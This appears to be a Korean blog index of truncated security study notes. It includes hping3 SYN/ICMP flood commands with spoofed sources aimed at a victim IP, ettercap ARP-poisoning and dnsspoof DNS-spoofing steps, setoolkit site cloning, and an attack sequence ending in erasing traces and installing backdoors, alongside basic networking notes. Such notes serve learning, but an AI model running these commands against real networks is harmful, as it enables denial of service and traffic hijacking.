목록전체 글 (57)
DDOS SYN Flooding hping3 --rand-source [victim ip] -p [port] -S --flood • —rand-source : 소스 ip주소를 랜덤으로 설정 • -p : 80번 포트로 패킷 전송 • -S : TCP 패킷만 전송 ICMP Flooding hping3 --icmp --rand-source [victim ip] -d 65535 --flood • —icmp : icmp 패킷을 전송 • -d : 패킷의 길이 (최대는 65535bytes) • —flood : 최대속도로 전송 메타스플로잇 http://exploit-db.com msfconsole help(?) : 명령어 목록 search : exploit 모듈 검색 show options : 옵션 보여줌 모듈 경로: ..
HTTP 데이터 전송 메소드 GET: 입력했던 모든 내용이 URL에 결과로 나타나남 POST: HTTP 메시지 안에 정보 저장 DNS spoofing dns.host 파일 생성 ([server ip] [domain name]) ettercap -T -M arp:remote //target ip/ //target gateway ip/ dnsspoof -i eth0 -f dns.host service --status-all 실행 중인 모든 데몬 확인 service apache2 start 아파치 실행 httrack setoolkit /var/www/html 아파치 페이지 저장 경로 s372n28yF4 출처: Wireshark tip 패킷 우클릭 - follow - stream 선택으로 패킷을 스트림형태로 보..
네트워크 해킹 공격의 순서풋 프린팅스캐닝목록화접근권한 획득권한 상승정보 수집흔적 삭제백도어 설치 DNS 동작의 이해URL 요청 (브라우저)DNS 캐시 메모리 조회 (컴퓨터 내부)Hosts 파일 조회 (컴퓨터 내부)DNS Query 발생 (컴퓨터 외부) Host-only / NAT / Bridge Ipconfig /displaydnsIpconfig /flushdns윈도우 hosts 파일C:\windows\System32\drivers\etc\hosts 리눅스 hostsetc/hosts DNS 서버 확인/etc/resolv.conf Linux 네트워크 설정하기@ifconfig [interface] up #사용함ifconfig [interface] down #사용안함ifconfig [interface] [ip..
데이터를 보내는 곳: Tx 데이터를 받는 곳: Rx Rx, Tx 순서는 어떤 node인지에 따라서 달라짐 Router, PC: Tx, Rx Switch(Bridge), Hub: Rx, Tx PC1 Tx Tx PC2 Rx Rx : Cross cable Prefix: /8, /16, /24 http://iana.org/numbers 참조 multicast주소 http://www.iana.org/assignments/multicast-addresses/multicast-addresses.xhtml IP 주소: Network ID + Host ID IPv4 예약된 주소 0.0.0.0: 모든 주소를 지칭. routing table에서 default route를 의미함 (netstat -nr: 라우팅 테이블 확인)..